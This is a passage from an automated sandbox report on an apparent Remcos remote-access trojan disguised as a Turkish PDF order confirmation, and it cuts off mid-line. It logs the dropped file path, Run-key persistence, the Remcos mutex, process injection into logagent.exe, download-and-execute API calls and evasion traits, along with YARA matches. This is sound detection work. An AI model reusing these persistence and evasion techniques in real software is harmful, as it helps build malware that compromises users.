                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_0040EC0F
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055059E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_1055059E
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1]
                    Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00411927
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00409A2F
                    Source: C:\Windows\SysWOW64\logagent.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-MZPAVR
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource, 3_2_00409D02
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder Window detected: More than 3 window changes detected

                    Data Obfuscation

                    Source: Yara match File source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, type: SAMPLE
                    Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 8.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 8.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: C:\Users\Public\Libraries\Eluiezilfw.exe, type: DROPPED
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5FFF push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5F96 push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5E3E push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E580B push ebp; iretd 0_3_036E580C
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E581C push ebp; iretd 0_3_036E581D
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E54D6 push ebp; iretd 0_3_036E5510
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_038D2098 push edx; ret 0_3_038D20A0
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0041BE7A push cs; ret 3_2_0041BE7B
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00413ED0 push eax; ret 3_2_00413EFE
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0041B326 push cs; ret 3_2_0041B327
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055585F push eax; ret 3_2_1055588D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10541040 push ss; retf 3_2_10541002
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055E44C push es; retf 3_2_1055E460
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile created: C:\Users\Public\Libraries\Eluiezilfw.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040D4E5
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00411700
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EluiezilfwJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EluiezilfwJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\SysWOW64\logagent.exe Stalling execution: Execution stalls by calling Sleep
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_004113C9
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh 3_2_00405156
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh 3_2_00405156
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 10546B0Ah 3_2_10546AE5
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 10546B0Ah 3_2_10546AE5
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00404C0A
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040751B
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$c